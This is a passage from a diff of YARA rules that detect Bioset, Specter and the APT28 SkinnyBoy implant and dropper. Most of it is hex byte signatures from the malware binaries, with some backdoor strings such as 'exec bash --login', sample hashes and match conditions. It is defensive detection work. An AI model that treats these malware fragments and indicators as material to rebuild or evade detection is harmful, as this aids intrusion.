00 89 04 24 8d 44 24 34 89 44 24 04 8d 44 24 34 89 44 24 08 c7 44 24 0c 1c 00 00 00 e8 b1 02 00 00 8b 44 24 } - $s5 = { 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ed 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b4 01 00 00 85 c0 74 7e 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ad 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b8 01 00 00 85 c0 74 04 83 c4 18 c3 8d 05 ?? ?? 8b 00 89 04 24 e8 c9 6c 02 00 8b 05 98 ?? bf 00 8b 4c 24 1c 8b 91 b4 01 00 00 89 04 24 89 54 24 04 e8 ad 04 00 00 8b 44 24 1c c7 80 b4 01 } + $s1 = { 55 8b ec 83 e4 f8 81 ec bc 06 00 00 a1 00 e0 40 00 33 c4 89 84 24 b8 06 00 00 53 56 57 33 c0 68 06 02 00 00 50 66 89 84 24 b8 02 00 00 8d 84 24 ba 02 00 00 50 8b f1 e8 64 31 00 00 8b 1d 28 90 40 00 0f 57 c0 83 c4 0c 8d 84 24 9c 02 00 00 50 c7 84 24 a0 02 00 00 79 00 00 00 66 0f d6 84 24 a4 02 00 00 66 0f d6 84 24 ac 02 00 00 c7 84 24 78 02 00 00 57 00 00 00 66 0f d6 84 24 7c 02 00 00 66 0f d6 84 24 84 02 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 85 d2 74 1b 8d 9b 00 00 00 00 66 8b 84 4c 74 02 00 00 66 31 84 4c 9c 02 00 00 41 3b ca 72 eb a1 80 cd 40 00 89 84 24 88 02 00 00 0f b7 05 84 cd 40 00 66 89 84 24 8c 02 00 00 a1 88 cd 40 00 89 84 24 74 02 00 00 0f b7 05 8c cd 40 00 66 89 84 24 78 02 00 00 0f 57 c0 8d 84 24 88 02 00 00 50 66 0f d6 84 24 92 02 00 00 c7 84 24 9a 02 00 00 00 00 00 00 66 c7 84 24 9e 02 00 00 00 00 66 0f d6 84 24 7e 02 00 00 c7 84 24 86 02 00 00 00 00 00 00 66 c7 84 24 8a 02 00 00 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 } + $s2 = { 66 8b 84 4c 74 02 00 00 66 31 84 4c 88 02 00 00 41 3b ca 72 eb 6a 64 6a 08 ff 15 30 90 40 00 50 ff 15 34 90 40 00 8b 1d 3c 90 40 00 89 44 24 0c 56 8d 84 24 b4 02 00 00 50 ff d3 8b 3d 44 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 68 90 cd 40 00 8d 84 24 b4 02 00 00 50 ff d3 8d 44 24 20 50 8d 84 24 b4 02 00 00 50 ff 15 40 90 40 00 8b f0 8d 84 24 b0 02 00 00 50 89 74 24 14 ff 15 40 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 83 fe ff 0f 84 21 02 00 00 8b 35 2c 90 40 00 8d 9b 00 00 00 00 8d 84 24 9c 02 00 00 50 8d 44 24 50 50 ff d6 85 } + $s3 = { ff 15 20 90 40 00 8d 44 24 14 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 28 ff 15 04 90 40 00 ff 15 20 90 40 00 6a 00 56 8d 44 24 54 50 ff 74 24 20 ff 15 14 90 40 00 ff 15 20 90 40 00 6a 00 8d 44 24 20 50 ff 74 24 14 c7 44 24 28 64 00 00 00 6a 02 ff 74 24 24 ff 15 10 90 40 00 ff 74 24 14 ff 15 00 90 40 00 6a 00 ff 74 24 1c ff 15 0c 90 40 00 8b 74 24 1c 8b 4c 24 0c ba 90 ed 40 00 83 ee } + $s4 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 } + $s5 = { 55 8b ec 81 ec 6c 04 00 00 a1 00 e0 40 00 33 c5 89 45 fc 56 33 c0 68 06 02 00 00 50 66 89 85 f0 fb ff ff 8d 85 f2 fb ff ff 50 8b f1 e8 8f 33 00 00 68 04 01 00 00 8d 85 f0 fb ff ff 6a 00 50 e8 7c 33 00 00 83 c4 18 56 ff 15 48 91 40 00 85 c0 0f 84 b6 01 00 00 b8 69 00 00 00 68 d2 00 00 00 66 89 85 24 ff ff ff 8d 85 26 ff ff ff 6a 00 50 c7 85 f8 fe ff ff 1f 00 16 00 c7 85 fc fe ff ff 0b 00 22 00 c7 85 00 ff ff ff 78 00 7c 00 c7 85 04 ff ff ff 00 00 55 00 c7 85 08 ff ff ff 5b 00 2e 00 c7 85 0c ff ff ff 3f 00 03 00 c7 85 10 ff ff ff 04 00 04 00 c7 85 14 ff ff ff 0d 00 15 00 c7 85 18 ff ff ff 47 00 44 00 c7 85 1c ff ff ff 47 00 14 00 c7 85 20 ff ff ff 09 00 68 00 e8 dd 32 00 00 f3 0f 7e 05 48 cd 40 00 66 0f d6 85 f8 fd ff ff f3 0f 7e 05 50 cd 40 00 66 0f d6 85 00 fe ff ff f3 0f 7e 05 58 cd 40 00 66 0f d6 85 08 fe ff ff f3 0f 7e 05 60 cd 40 00 66 0f d6 85 10 fe ff ff f3 0f 7e 05 68 cd 40 00 68 d0 00 00 00 66 0f d6 85 18 fe ff ff f3 0f 7e 05 70 cd 40 00 8d 85 28 fe ff ff 6a 00 50 66 0f d6 85 20 fe ff ff e8 6a 32 00 00 83 c4 18 33 } + $s6 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 } condition: - uint16(0)==0x5a4d and filesize >40KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) } -rule ARKBIRD_SOLG_MAL_ELF_Bioset_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Skinnyboy_Implant_Jun_2021_1 : FILE { meta: - description = "Detect the Bioset malware" + description = "Detect SkinnyBoy Implant" author = "Arkbird_SOLG" - id = "1b95c3df-7543-521c-a28b-d540ad0bd648" - date = "2021-07-02" - modified = "2021-07-05" - reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Bioset/MAL_ELF_Bioset_Jul_2021_1.yara#L1-L26" + id = "2c78e0f3-a0b3-56fb-b4d2-313c03f1331b" + date = "2021-06-05" + modified = "2021-06-06" + reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Implant_Jun_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "b5ba7f4517f07d8657cbd54695cad88d8c2f263ee010bd70c4a05433b2927576" + logic_hash = "37d6b03adaad0a97e91a366d8e5ce47bc0eb77263849422129edf9df28d25bd8" score = 75 quality = 75 tags = "FILE" - hash1 = "3afe2ec273608be0b34b8b357778cc2924c344dd1b00a84cf90925eeb2469964" - hash2 = "3de97c2b211285022a34a62b536cef586d987939d40d846930c201d010517a10" - hash3 = "b00157dbb371e8abe19a728104404af61acc3c5d4a6f67c60e694fe0788cb491" - hash4 = "7fa37dd67dcd04fc52787c5707cf3ee58e226b98c779feb45b78aa8a249754c7" - hash5 = "79e93f6e5876f31ddc4a6985b290ede6a2767d9a94bdf2057d9c464999163746" + hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698" tlp = "White" - adversary = "-" + adversary = "APT28" strings: - $s1 = "exec bash --login" fullword ascii - $s2 = { 55 48 89 e5 53 48 83 ec 48 48 89 7d b8 48 c7 45 d8 [2] 40 00 48 c7 45 d0 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 eb 30 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 89 c2 8b 45 e8 01 d0 83 c0 01 89 45 e8 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 85 c0 75 b4 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 18 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 48 83 c0 01 48 01 d8 48 89 45 d0 8b 45 e8 48 98 48 89 c7 e8 ?? fb ff ff 48 89 45 e0 c7 45 ec 00 00 00 00 eb 74 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 10 48 8b 45 e0 48 89 d6 48 89 c7 e8 ?? f9 ff ff 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? f9 ff ff 89 45 cc 8b 45 cc 48 98 48 83 c0 01 48 01 45 e0 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 c2 48 8b 45 e0 48 89 02 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 } - $s3 = "amcsh_connect" fullword ascii - $s4 = "GOT HAHA: %d" fullword ascii - $s5 = { 52 65 63 76 65 64 20 74 65 72 6d 20 65 6e 76 20 76 61 72 3a 20 25 73 00 77 69 6e 3a 25 64 2c 25 64 } - $s6 = { 55 48 89 e5 48 81 ec f0 20 00 00 89 bd 1c df ff ff 48 c7 45 f0 [2] 40 00 48 8d 85 20 df ff ff be 01 20 00 00 48 89 c7 e8 ?? fa ff ff 48 8d b5 28 ff ff ff 48 8d 85 2c ff ff ff 41 b8 00 00 00 00 b9 00 00 00 00 ba 00 00 00 00 48 89 c7 e8 ?? fa ff ff 85 c0 79 2a e8 ?? f8 ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 26 fc ff ff b8 01 00 00 00 e9 f8 05 00 00 8b 85 28 ff ff ff 89 c7 e8 ?? fa ff ff 48 89 45 e8 48 83 7d e8 00 75 0a b8 01 00 00 00 e9 d6 05 00 00 bf [2] 40 00 e8 ?? f9 ff ff 48 8d 95 20 df ff ff 8b 85 1c df ff ff 48 89 d6 89 c7 e8 ?? 17 00 00 89 45 fc 83 7d fc 00 79 2a e8 [2] ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 b0 fb ff ff } - $s7 = { 8b 45 fc 48 63 d0 8b 85 2c ff ff ff 48 8d 8d 20 df ff ff 48 89 ce 89 c7 e8 ?? f3 ff ff 89 45 fc 8b 45 fc 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 f0 f6 ff ff 83 7d fc } - $s8 = { 55 48 89 e5 53 48 81 ec e8 00 00 00 48 89 b5 48 ff ff ff 48 89 95 50 ff ff ff 48 89 8d 58 ff ff ff 4c 89 85 60 ff ff ff 4c 89 8d 68 ff ff ff 84 c0 74 23 0f 29 85 70 ff ff ff 0f 29 4d 80 0f 29 55 90 0f 29 5d a0 0f 29 65 b0 0f 29 6d c0 0f 29 75 d0 0f 29 7d e0 48 89 bd 18 ff ff ff 48 8b 05 [2] 20 00 48 85 c0 75 16 be [2] 40 00 bf [2] 40 00 e8 ?? fd ff ff 48 89 05 [2] 20 00 c7 85 20 ff ff ff 08 00 00 00 c7 85 24 ff ff ff 30 00 00 00 48 8d 45 10 48 89 85 28 ff ff ff 48 8d 85 40 ff ff ff 48 89 85 30 ff ff ff 48 8b 05 [2] 20 00 48 8d 95 20 ff ff ff 48 8b 8d 18 ff ff ff 48 89 ce 48 89 c7 e8 ?? fd ff ff 48 c7 85 38 ff ff ff [2] 40 00 48 8b 1d [2] 20 00 48 8b 85 38 ff ff ff 48 89 c7 e8 ?? fb ff ff 48 89 c6 48 8b 85 38 ff ff ff 48 89 d9 ba 01 00 00 00 48 89 c7 e8 ?? fd ff ff 48 8b 05 [2] 20 00 48 89 c7 e8 ?? fc ff ff 48 81 c4 e8 00 00 00 5b } + $s1 = { 55 8b ec 81 ec 48 01 00 00 a1 00 00 01 10 33 c5 89 45 fc 53 56 57 6a 00 6a 00 6a 00 8b c2 6a 00 68 6c ef 00 10 89 85 d0 fe ff ff 89 8d cc fe ff ff 89 85 e4 fe ff ff c7 85 c0 fe ff ff 01 00 00 00 c7 85 d8 fe ff ff 00 00 00 00 c7 85 dc fe ff ff 00 00 00 00 ff 15 e4 b1 00 10 8b 1d a4 b0 00 10 8b f0 89 b5 d4 fe ff ff ff d3 8b 3d d4 b1 00 10 85 f6 74 26 6a 04 8d 85 ec fe ff ff 50 6a 06 56 c7 85 ec fe ff ff c0 27 09 00 ff d7 6a 04 8d 85 ec fe ff ff 50 6a 05 56 ff d7 ff d3 85 f6 74 22 6a 01 6a 00 6a 03 6a 00 6a 00 68 bb 01 00 00 ff b5 cc fe ff ff 56 ff 15 cc b1 00 10 89 85 d8 fe ff ff ff d3 8b 4d 08 8b 3d e8 b1 00 10 81 f9 00 00 a0 00 0f 83 a7 01 00 00 68 03 01 00 00 8d 85 f1 fe ff ff 6a 00 50 c6 85 f0 fe ff ff 00 e8 3c 33 00 00 83 c4 0c ba 01 00 00 00 6a 00 6a 01 8d 8d f0 fe ff ff e8 55 f7 ff ff 83 c4 08 8d 55 08 8d 8d e4 fe ff ff e8 94 f6 ff ff 8d bd f0 fe ff ff 8d 4f 01 8a 07 47 84 c0 75 f9 8b 75 08 2b f9 8d 04 37 50 6a 08 89 85 e0 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 57 8d 8d f0 fe ff ff 51 50 89 85 d0 fe ff ff e8 62 6e 00 00 8b 85 d0 fe ff ff 83 c4 0c 03 c7 56 8b b5 e4 fe ff ff 56 50 e8 49 6e 00 00 83 c4 0c 56 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 57 8d 85 f0 fe ff ff 6a 00 50 e8 96 32 00 00 83 c4 0c 8d 8d d4 fe ff ff 6a 01 ff b5 e0 fe ff ff ff b5 d0 fe ff ff e8 8a f3 ff ff 85 c0 0f 84 7c 03 00 00 8b 85 d4 fe ff ff 8b 3d e8 b1 00 10 85 c0 74 03 50 ff d7 8b 85 d8 fe ff ff 85 } + $s2 = { 33 d2 8b c1 b9 00 00 20 00 f7 f1 33 c9 89 8d e4 fe ff ff 3b ca 89 95 b8 fe ff ff 1b d2 f7 da 03 d0 89 95 c4 fe ff ff 0f 84 98 02 00 00 8b ff 8b b5 b8 fe ff ff 85 f6 74 09 8d 42 ff 8b fe 3b c8 74 05 bf 00 00 20 00 57 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b 8d e4 fe ff ff 0f af cf 03 8d d0 fe ff ff 57 8b f0 51 56 89 b5 ec fe ff ff e8 c9 6c 00 00 83 c4 0c 8d 85 f1 fe ff ff 68 03 01 00 00 6a 00 50 c6 85 f0 fe ff ff 00 e8 1c 31 00 00 8b 85 e4 fe ff ff 83 c4 0c 40 6a 00 ff b5 c4 fe ff ff 8b d0 8d 8d f0 fe ff ff 89 85 e4 fe ff ff e8 27 f5 ff ff 83 c4 08 8d 85 e0 fe ff ff 50 6a 00 6a 01 57 56 c7 85 e0 fe ff ff 00 00 00 00 ff 15 24 b0 00 10 85 c0 74 4c ff b5 e0 fe ff ff 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b f0 8d 85 e0 fe ff ff 50 56 6a 01 57 8b bd ec fe ff ff 57 ff 15 24 b0 00 10 57 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 8b bd e0 fe ff ff 89 b5 ec fe ff ff 8d b5 f0 fe ff ff 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 8d 04 3e 50 6a 08 89 85 c8 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 56 8d 8d f0 fe ff ff 51 50 89 85 bc fe ff ff e8 d8 6b 00 00 8b 8d bc fe ff ff 83 c4 0c 03 ce 57 8b bd ec fe ff ff 57 51 e8 bf 6b 00 00 83 c4 0c 57 6a 00 ff 15 b4 b0 00 10 50 ff 15 b8 b0 00 10 56 8d 85 f0 fe ff ff 6a 00 50 e8 0d 30 00 00 8b b5 c0 fe ff ff 8b bd bc fe ff ff 83 c4 0c 8d 8d d4 fe ff ff 56 ff b5 c8 fe ff ff 57 e8 fb f0 ff ff 85 c0 0f 84 c9 00 00 00 85 f6 0f 84 c1 00 00 00 8b 85 d4 fe ff ff 8b 35 e8 b1 00 10 85 } + $s3 = { 55 8b ec 83 e4 f8 81 ec 34 02 00 00 a1 00 00 01 10 33 c4 89 84 24 30 02 00 00 53 56 57 6a ff ff 35 28 1b 01 10 ff 15 4c b0 00 10 ff 35 28 1b 01 10 ff 15 80 b0 00 10 8b 35 b8 b0 00 10 8b 3d b4 b0 00 10 8d 44 24 10 50 8d 54 24 10 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 e8 df 0a 00 00 8b 4c 24 14 83 c4 04 85 c9 0f 84 e6 02 00 00 8b 54 24 0c 33 c0 33 db c7 44 24 20 00 00 00 00 89 44 24 1c 85 c9 0f 84 c2 02 00 00 8d 64 24 00 8b 34 13 8d 04 13 56 6a 08 ff d7 50 ff 15 ec b0 00 10 8b c8 8b 44 24 0c 83 c0 04 56 03 c3 50 51 89 4c 24 24 e8 a7 7e 00 00 8b 44 24 18 03 c3 83 c4 0c 8b 44 06 04 50 6a 08 89 44 24 1c ff d7 50 ff 15 ec b0 00 10 ff 74 24 14 8b f8 8b 44 24 10 03 c3 83 c6 08 03 c6 50 57 e8 72 7e 00 00 83 c4 0c 68 04 01 00 00 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 68 00 00 00 f0 6a 18 6a 00 8b f0 6a 00 8d 44 24 34 50 c7 44 24 38 00 00 00 00 c7 44 24 3c 00 00 00 00 ff 15 18 b0 00 10 } + $s4 = { ff 15 a4 b0 00 10 8d 44 24 28 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 34 ff 15 14 b0 00 10 ff 15 a4 b0 00 10 6a 00 ff 74 24 18 57 ff 74 24 34 ff 15 0c b0 00 10 ff 15 a4 b0 00 10 6a 00 8d 44 24 30 50 56 6a 02 ff 74 24 38 c7 44 24 40 04 01 00 00 ff 15 10 b0 00 10 ff 74 24 28 ff 15 00 b0 00 10 6a 00 ff 74 24 28 ff 15 04 b0 00 10 8b 54 24 2c 8b 44 24 18 } + $s5 = { 50 68 04 01 00 00 ff 15 a8 b0 00 10 8d 44 24 30 50 ff 15 a0 b1 00 10 68 18 ee 00 10 8d 44 24 34 50 ff 15 9c b0 00 10 b8 4d 5a 00 00 66 39 07 0f 85 b2 00 00 00 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 68 00 00 00 40 8d 44 24 48 50 ff 15 40 b0 00 10 8b f0 ff 15 a4 b0 00 10 83 fe } + $s6 = { 6a 00 8d 44 24 28 50 ff 74 24 1c c7 44 24 30 00 00 00 00 57 56 ff 15 38 b0 00 10 56 ff 15 44 b0 00 10 68 80 00 00 00 8d 44 24 34 50 ff 15 48 b0 00 10 8d 44 24 30 50 ff 15 a4 b1 00 10 85 c0 74 2d 8d 44 24 30 50 ff 15 b0 b0 00 10 8b f0 6a 01 56 ff 15 a0 b0 00 10 8d 4c 24 20 51 a3 20 1b 01 10 ff d0 56 89 44 24 20 ff 15 f4 b0 00 10 e8 ad f3 ff ff 57 8b 3d b4 b0 00 10 6a 00 ff d7 8b 35 b8 b0 00 10 50 ff d6 ff 74 24 18 6a 00 ff d7 50 ff d6 8b 44 24 1c 85 c0 74 12 8b 54 24 20 50 b9 4c ef 00 10 e8 77 0c 00 00 83 c4 04 8b 54 24 0c 8b 0c 13 8d 04 13 8d 04 19 83 c3 08 8b 44 10 04 03 c1 03 d8 3b 5c 24 10 0f 82 42 fd ff ff 52 6a 00 ff d7 50 ff d6 68 00 dd 6d 00 ff 35 28 1b 01 10 ff 15 4c b0 00 10 85 c0 0f 85 d4 fc ff ff } condition: - uint32(0)==0x464c457f and filesize >10KB and 6 of ($s*) + uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) } -rule ARKBIRD_SOLG_MAL_ELF_Specter_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Skinnyboy_Dropper_Jun_2021_1 : FILE { meta: - description = "Detect the Specter malware" + description = "Detect SkinnyBoy Dropper" author = "Arkbird_SOLG" - id = "24237a56-2717-5efc-9bfb-9ab6d87e082b" - date = "2021-07-02" - modified = "2021-07-05" - reference = "https://twitter.com/JAMESWT_MHT/status/1410870749473148930" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Specter/MAL_ELF_Specter_Jul_2021_1.yara#L1-L20" + id = "1ea4cfe7-d44d-5cdb-8436-cb2b09dd2e56" + date = "2021-05-01" + modified = "2021-06-06" + reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Dropper_Jun_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "de737f051d34edb2219e77c0d4f0239b95bad9983ee5e435d6ee9741525816f0" + logic_hash = "805bc5bb5833a75d68df2a6ce828d70b2257809a3699fdca5e621aae6bdc5070" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "0bff46518b35ddfe37f4a7820286aab829d81f1480d9eeca5aaedc9ceda6724f" - hash2 = "be97d7ae3b2d876f027d99d8d61dbca92513f4975336c2ebc26cf8a0839b67b6" + hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9" tlp = "White" - adversary = "Specter" + adversary = "APT28" strings: - $s1 = { 41 57 41 89 cf 41 56 4d 89 c6 41 55 41 89 f5 be 01 00 00 00 41 54 49 89 fc bf 02 00 00 00 55 89 d5 31 d2 53 48 83 ec 38 48 c7 44 24 20 00 00 00 00 48 c7 44 24 28 00 00 00 00 e8 cf bf fe ff be 03 00 00 00 89 c3 89 c7 31 c0 e8 1f c4 fe ff 80 cc 08 be 04 00 00 00 89 df 89 c2 31 c0 e8 0c c4 fe ff 48 8d 74 24 20 89 ea 89 df 66 c1 ca 08 66 89 54 24 22 ba 10 00 00 00 66 c7 44 24 20 02 00 44 89 e8 31 ed 0f c8 89 44 24 24 e8 ae be fe ff 85 c0 0f 84 c5 00 00 00 e8 11 c0 fe ff 83 38 73 48 89 c5 74 07 89 df e8 12 b8 fe ff 8b 6d 00 83 fd 73 0f 85 a5 00 00 00 bf 1c 00 00 00 e8 dc b9 fe ff 48 85 c0 48 89 c2 0f 84 8c 00 00 00 44 89 68 14 89 58 18 4d 8d 6c 24 60 44 89 78 10 41 0f 10 06 4c 89 ef 4d 8d 74 24 50 0f 11 02 0f 29 04 24 48 89 04 24 e8 74 c2 fe ff bf 18 00 00 00 e8 b2 b5 07 00 48 85 c0 74 17 48 8b 14 24 48 c7 00 00 00 00 00 48 c7 40 08 00 00 00 00 48 89 50 10 4c 89 f6 48 89 c7 e8 9b fe 08 00 4c 89 ef e8 0b c3 fe ff 41 8b bc 24 88 00 00 00 48 8d 4c 24 14 89 da be 01 00 00 00 89 5c 24 18 c7 44 24 14 1d 20 00 80 e8 26 bd fe } - $s2 = { 55 31 c0 b9 5d 00 00 00 53 48 89 fb 48 81 ec 48 01 00 00 48 8d 7c 24 4e f3 aa 48 8d 7c 24 4e e8 d2 03 00 00 48 8d bc 24 ab 00 00 00 31 c0 b9 07 00 00 00 48 8d 74 24 28 c7 44 24 30 00 00 00 00 48 c7 44 24 38 00 00 00 00 f3 ab 48 8b 84 24 70 01 00 00 48 8d 7c 24 4e 48 89 44 24 40 48 8d 44 24 30 48 89 44 24 28 e8 36 08 00 00 8b 6c 24 30 85 ed 0f 85 89 00 00 00 48 8b 44 24 40 48 8b 00 48 8b 40 e8 48 39 44 24 38 75 76 48 8d bc 24 c7 00 00 00 31 c0 b9 5d 00 00 00 f3 aa 48 8d bc 24 c7 00 00 00 e8 4d 03 00 00 48 8d bc 24 24 01 00 00 b9 07 00 00 00 89 e8 48 8d 94 24 c7 00 00 00 48 8d 74 24 4e f3 ab 48 8d 7b 18 e8 64 26 00 00 b9 08 00 00 00 48 89 e7 48 8d b4 24 60 01 00 00 f3 a5 48 8d b4 24 c7 00 00 00 89 c2 48 89 df e8 6e fb ff ff 48 8d bc 24 c7 00 00 00 e8 e3 03 00 00 48 8d 7c 24 4e e8 d9 03 00 00 48 81 c4 } - $s3 = { 83 fa 03 0f 86 e6 00 00 00 41 57 41 56 41 55 41 54 49 89 cc 55 48 89 fd 53 48 89 f3 48 83 ec 28 66 8b 46 04 44 8b 76 0c 44 8b 3e 66 89 44 24 0c 66 8b 46 06 45 8d 6e 01 44 89 7c 24 08 44 89 74 24 14 66 89 44 24 0e 8b 46 08 4c 89 ef 89 44 24 10 e8 f4 b3 fe ff 48 89 c2 48 89 44 24 18 4c 89 e9 31 c0 48 89 d7 48 8d 73 10 f3 aa 48 89 d7 4c 89 f1 f3 a4 44 89 fe 48 89 ef e8 9b fa ff ff ff c0 74 07 4c 89 e1 31 d2 eb 4b 66 83 7c 24 0e 03 75 21 48 8b 74 24 18 48 8d 54 24 10 48 89 ef e8 d4 f8 ff ff 84 c0 75 0b e8 ad b9 fe ff 8b 00 85 c0 75 18 0f b7 54 24 0c 8b 4c 24 08 4d 89 e0 8b 74 24 10 48 89 ef e8 e1 f8 ff ff 83 f8 73 74 11 4c 89 e1 89 c2 8b 74 24 08 48 89 ef e8 ff fe ff ff 48 83 } - $s4 = { 48 8d 05 5a 5f 0b 00 48 89 84 24 80 00 00 00 48 8b 05 cf 75 30 00 be 18 00 00 00 bf 01 00 00 00 ff 10 48 85 c0 48 89 84 24 98 00 00 00 0f 84 fa fc ff ff 4c 8d bc 24 98 00 00 00 48 8b 54 24 60 48 8d 35 00 2b 0b 00 31 c0 4c 89 ff e8 2c ef ff ff 85 c0 0f 85 f4 fb ff ff 49 8b b5 f8 0d 00 00 48 85 f6 0f 84 13 09 00 00 31 ed 41 0f b7 86 ac 03 00 00 66 25 20 40 66 83 f8 20 0f 84 03 09 00 00 80 7c 24 78 00 0f 84 01 07 00 00 49 8b 8e 18 02 00 00 49 8b 96 10 02 00 00 4c 8d 46 06 48 8d 35 a6 2a 0b 00 4c 89 ff 31 c0 e8 ce ee ff ff 85 c0 0f 85 96 fb ff ff 41 0f b7 86 ac 03 00 00 4c 8d 25 42 eb 0a 00 66 25 20 40 66 83 f8 20 0f 84 55 0b 00 00 49 83 bd f8 0e 00 00 00 48 8d 05 25 eb 0a 00 74 0e 49 8b 96 30 04 00 00 48 85 d2 48 0f 45 c2 49 8b 95 68 0c 00 00 48 8d 35 07 eb 0a 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 18 04 00 00 48 85 d2 48 0f 45 f2 49 8b 96 50 04 00 00 48 8d 0d e1 ea 0a 00 48 85 d2 48 0f 44 d1 49 89 d3 48 8b 54 24 50 48 8b 52 20 48 85 d2 48 0f 44 d1 49 89 d2 49 8b 95 50 0d 00 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 10 04 00 00 48 85 d2 48 0f 45 ca 41 f6 85 85 15 00 00 02 48 8d 2d 96 ea 0a 00 74 0e 49 8b 96 28 04 00 00 48 85 d2 48 0f 45 ea 49 8b be 20 04 00 00 48 8d 15 78 ea 0a 00 4d 8b 8e 08 04 00 00 4d 8b 86 38 04 00 00 48 89 4c 24 10 48 8b 8c 24 80 00 00 00 48 89 74 24 28 48 8d 35 f6 23 0b 00 48 85 ff 4c 89 5c 24 20 4c 89 54 24 18 48 0f 44 